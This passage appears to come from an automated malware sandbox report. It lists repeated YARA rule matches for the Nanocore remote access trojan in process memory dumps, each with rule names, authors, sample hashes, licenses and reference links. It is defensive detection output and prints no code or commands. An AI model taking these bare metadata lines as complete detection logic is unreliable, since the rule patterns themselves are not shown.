      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2, date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1, date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_NanoCore, author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Nanocore_d8c4e3c5, reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
